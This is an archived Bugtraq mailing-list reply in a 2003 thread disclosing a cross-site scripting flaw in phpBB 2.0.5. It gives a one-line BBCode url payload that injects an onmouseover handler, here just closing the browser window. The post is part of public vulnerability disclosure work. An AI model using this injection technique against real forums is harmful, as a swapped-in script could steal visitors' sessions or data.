Bugtraq mailing list archives

Re: XSS vulnerability in phpBB (an other ;-)

From: "Everett Feldt" <efeldt () cox net>
Date: Tue, 9 Sep 2003 20:02:42 -0400

Using [url=http://www.google.com "onmouseover="window.close();"]Funny
website[/url]

I was able to get the browser to close. This was done on phpBB 2.0.5

Current thread:

XSS vulnerability in phpBB (an other ;-) keupon_ps2 (Sep 08)
- Re: XSS vulnerability in phpBB (an other ;-) Victor Sheldeshov (Sep 09)
- <Possible follow-ups>
- Re: XSS vulnerability in phpBB (an other ;-) John Smith (Sep 09)
  - Re: XSS vulnerability in phpBB (an other ;-) Michael Renzmann (Sep 09)
- Re: XSS vulnerability in phpBB (an other ;-) omere (Sep 09)
- Re: XSS vulnerability in phpBB (an other ;-) keupon_ps2 (Sep 09)
- Re: XSS vulnerability in phpBB (an other ;-) Everett Feldt (Sep 10)
- Re: XSS vulnerability in phpBB (an other ;-) Steven M. Christey (Sep 10)